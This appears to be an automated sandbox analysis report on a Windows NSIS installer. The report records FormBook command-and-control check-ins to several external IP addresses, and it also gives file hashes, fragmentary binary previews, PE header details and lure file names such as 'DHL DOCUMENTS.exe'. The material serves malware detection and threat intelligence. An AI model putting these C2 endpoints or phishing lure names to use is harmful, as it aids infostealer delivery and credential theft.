                                                                                                                        Preview: h......fe..Q.D.V...8.lt`.%._..Q....mVG............6.o....B........^..E....W...=Bl....S1.u.2.a.P..Nf&.s.Q..8..|[...B.#...5.. f;...).......W..!t ^9.VN.TA..G-...].....N....0x....oP.W.7.R.c.llf.|tv.I.5.1<&..4|7P.Dx.d.r$3....p|.w..R`2DBz.....N.s.8.......fe.T.q....Nr..........Q....m7G.....Y......6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..9R2.......@......l.f.|tv.4...$f<.(...7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....
                                                                                                                        C:\Users\user\AppData\Local\Temp\axjnwhbrvqsxuek
                                                                                                                        Process:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        File Type:DOS executable (COM)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):58134
                                                                                                                        Entropy (8bit):5.253844260673871
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:IMtQIDSwNLs8vRjAU+YqXFCeI3SoKZshe9uB:IMtQIDSwNL7ZjwV4eI3LKZ2B
                                                                                                                        MD5:D5C9184EC17F0CE4778AB93D418EFB6B
                                                                                                                        SHA1:FA5B4C0A266AE61855B671E50BBF23E8EF5D246E
                                                                                                                        SHA-256:A8863C2A1805C6E00A88A319BEEAE073336708F861D07986D8DF38B593EF5B0E
                                                                                                                        SHA-512:F9042310DA98088500A9730CD2BFA76FDF4835AF33B8BE9C0BA3A11E67F6DC56661E0AB92425658D1F91FDA7BAB964D134595748C7C3E1EB1EE174963FC1158E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: .....U..x........S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):10752
                                                                                                                        Entropy (8bit):5.7425597599083344
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
                                                                                                                        MD5:56A321BD011112EC5D8A32B2F6FD3231
                                                                                                                        SHA1:DF20E3A35A1636DE64DF5290AE5E4E7572447F78
                                                                                                                        SHA-256:BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
                                                                                                                        SHA-512:5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                        • Filename: hesaphareketi-0.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 0FKzNO1g3P.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mlzHNUHkUl.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Ejima.exe, Detection: malicious, Browse
                                                                                                                        • Filename: UrgentNewOrder_pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Swift 001.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DHL DOCUMENTS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DHL Shipment Documents.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 20210622-kll98374.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Pending delivery - Final Attempt.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2bni49vTpt.exe, Detection: malicious, Browse
                                                                                                                        • Filename: rJIeeo2B7Q.exe, Detection: malicious, Browse
                                                                                                                        • Filename: e-hesap bildirimi.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious, Browse
                                                                                                                        • Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 232.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Yeni Siparis.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.8818598681550505
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:PQMW0W5h3X.exe
                                                                                                                        File size:205167
                                                                                                                        MD5:6b26db585f40e14b00b5adda57e595dd
                                                                                                                        SHA1:ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
                                                                                                                        SHA256:8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
                                                                                                                        SHA512:c26411bdcd24c4c8a403f0f976b1a7bcb9cad433da9a48e7b4cb4297db3a8f11ec929444a63fc3529c634bdb549704addfa7ef04f6b6130abbf03348ce92d8ba
                                                                                                                        SSDEEP:3072:ABynOpL12rioc6MspGSA6DPJdXBH79/el5iVnLBMpBVeyb4+NVLhSkodlMxcGUHf:ABlL/bssSTPvXBwIGpBbUe/odlVDVBX
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4030fb
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov dword ptr [esp+14h], 00409168h
                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                        mov byte ptr [esp+18h], 00000020h
                                                                                                                        call dword ptr [004070B0h]
                                                                                                                        call dword ptr [004070ACh]
                                                                                                                        cmp ax, 00000006h
                                                                                                                        je 00007F7734B820B3h
                                                                                                                        push ebx
                                                                                                                        call 00007F7734B84E94h
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F7734B820A9h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 00407280h
                                                                                                                        push esi
                                                                                                                        call 00007F7734B84E10h
                                                                                                                        push esi
                                                                                                                        call dword ptr [00407108h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F7734B8208Dh
                                                                                                                        push 0000000Dh
                                                                                                                        call 00007F7734B84E68h
                                                                                                                        push 0000000Bh
                                                                                                                        call 00007F7734B84E61h
                                                                                                                        mov dword ptr [00423F44h], eax
                                                                                                                        call dword ptr [00407038h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040726Ch]
                                                                                                                        mov dword ptr [00423FF8h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041F4F0h
                                                                                                                        call dword ptr [0040715Ch]
                                                                                                                        push 0040915Ch
                                                                                                                        push 00423740h
                                                                                                                        call 00007F7734B84A94h
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        mov ebp, 0042A000h
                                                                                                                        push eax
                                                                                                                        push ebp
                                                                                                                        call 00007F7734B84A82h
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407144h]

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc80.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x2d0000xc800xe00False0.412109375data4.00712910454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x2d1d80x2e8dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d4c00x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d5c00x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d6e00x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0x2d7400x14dataEnglishUnited States
                                                                                                                        RT_VERSION0x2d7580x254data
                                                                                                                        RT_MANIFEST0x2d9b00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                        USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                        ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                        Version Infos

                                                                                                                        DescriptionData
                                                                                                                        LegalCopyrightlieutenant
                                                                                                                        FileVersion9.7.6.5
                                                                                                                        CompanyNamestone
                                                                                                                        LegalTrademarksapologizes
                                                                                                                        Commentsfirearms
                                                                                                                        ProductNamegrandeur
                                                                                                                        FileDescriptionundoubtedly
                                                                                                                        Translation0x0000 0x04e4

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/22/21-18:25:02.550642TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:07.827526TCP1201ATTACK-RESPONSES 403 Forbidden804975734.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:18.311331TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.311331TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.311331TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.451876TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:23.578876TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.578876TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.578876TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.719109TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:39.828190TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:39.828190TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:39.828190TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:51.038848TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:25:51.038848TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:25:51.038848TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:26:06.760886TCP1201ATTACK-RESPONSES 403 Forbidden804977175.2.81.221192.168.2.6
                                                                                                                        06/22/21-18:26:17.999823TCP1201ATTACK-RESPONSES 403 Forbidden804977334.102.136.180192.168.2.6

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 22, 2021 18:25:02.366617918 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.409193039 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.409516096 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.409568071 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.451952934 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550642014 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550687075 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550992012 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.551043987 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.593966961 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.643510103 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.686371088 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.686568975 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.686913967 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.729299068 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.827526093 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.827579021 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.828515053 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.828553915 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.872838020 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.050292969 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.103003979 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.103123903 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.103247881 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.156203032 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.156636000 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.156657934 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.209656954 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.268053055 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.311075926 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.311197996 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.311331034 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.354171991 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.451875925 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.451911926 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.452157021 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.452346087 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.494915962 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.535876989 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.578468084 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.578567028 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.578876019 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.622807026 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719109058 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719168901 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719352961 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.720000029 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.762451887 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:28.954170942 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.143964052 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.144161940 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.144289017 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.335238934 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339704037 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339749098 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339865923 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.339929104 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.529345036 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.785697937 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.827903032 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.828003883 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.828190088 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.870101929 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.894753933 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.895276070 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.895589113 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.895711899 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.937609911 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.000245094 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.191946030 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.192121029 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.192420959 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.386563063 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386607885 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386637926 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386665106 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386687040 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386976957 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.387248039 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.577028990 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:50.751912117 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.038350105 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.038614035 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.038847923 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.324135065 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324237108 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324249983 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324599028 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.324770927 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.610224009 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.555407047 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.599483967 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.599612951 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.599775076 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.644592047 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.760885954 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.760915995 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.761118889 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.761343956 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.789345026 CEST804977175.2.81.221192.168.2.6
